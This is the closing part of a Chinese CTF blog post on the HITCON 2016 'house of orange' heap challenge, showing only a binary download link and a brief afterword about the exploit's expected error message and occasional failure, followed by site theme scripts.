<h1 id="程序链接"><a href="#程序链接" class="headerlink" title="程序链接"></a>程序链接</h1><p><a href="https://github.com/ctfs/write-ups-2016/raw/master/hitcon-ctf-2016/pwn/house-of-orange-500/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682" target="_blank" rel="noopener">house of orange</a></p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>这篇文章写得是真的乱233333<br>在写好exp后，运行最后会报<code>memory corruption</code>，我还以为出错了，又调了半天_(:зゝ∠)_，最后才反应过来程序本来就要调用<code>malloc_printerr</code>。。。默默输了个<code>ls</code>，看到回显感动得一匹。<br>话说这exp有一定概率会失败，并不清楚原因_(:зゝ∠)_。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/堆利用/" rel="tag"># 堆利用</a>
          
            <a href="/tags/house-of-orange/" rel="tag"># house_of_orange</a>
          
            <a href="/tags/IO-FILE/" rel="tag"># IO_FILE</a>
          
            <a href="/tags/unsortedbin-attack/" rel="tag"># unsortedbin_attack</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/post/1b661c73.html" rel="next" title="hack.lu2014-oreo writeup">
                <i class="fa fa-chevron-left"></i> hack.lu2014-oreo writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Hpasserby</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.redog.me/" title="wjllz师傅的blog" rel="external nofollow" target="_blank">wjllz师傅的blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.sunyq.xin/" title="sunyq大佬的blog" rel="external nofollow" target="_blank">sunyq大佬的blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#概述"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#题目描述"><span class="nav-number">2.</span> <span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#程序分析"><span class="nav-number">3.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞分析"><span class="nav-number">4.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#泄露libc基址和堆地址"><span class="nav-number">4.1.</span> <span class="nav-text">泄露libc基址和堆地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#原理"><span class="nav-number">4.1.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用过程"><span class="nav-number">4.1.2.</span> <span class="nav-text">利用过程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#劫持流程"><span class="nav-number">4.2.</span> <span class="nav-text">劫持流程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#FILE介绍"><span class="nav-number">4.2.1.</span> <span class="nav-text">FILE介绍</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#unsortedbin-attack"><span class="nav-number">4.3.</span> <span class="nav-text">unsortedbin attack</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#原理-1"><span class="nav-number">4.3.1.</span> <span class="nav-text">原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FSOP"><span class="nav-number">4.4.</span> <span class="nav-text">FSOP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞原理"><span class="nav-number">4.4.1.</span> <span class="nav-text">漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用"><span class="nav-number">4.4.2.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用过程-1"><span class="nav-number">4.4.3.</span> <span class="nav-text">利用过程</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EXP"><span class="nav-number">5.</span> <span class="nav-text">EXP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#程序链接"><span class="nav-number">6.</span> <span class="nav-text">程序链接</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后记"><span class="nav-number">7.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hpasserby</span>

  
  <!--以下2行为一条竖线和Coding Page-->
  <span class="post-meta-divider">|</span>
  <span>Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a></span>
</div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("XbHUIXIhHF4PhSdodUFsFxLI-gzGzoHsz", "09wfAdJS1yR0L81DWESYD76o");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

  <!-- 代码块复制功能 -->
  <script type="text/javascript" src="/js/src/clipboard.min.js"></script>  
  <script type="text/javascript" src="/js/src/clipboard-use.js"></script>
</body>
</html>
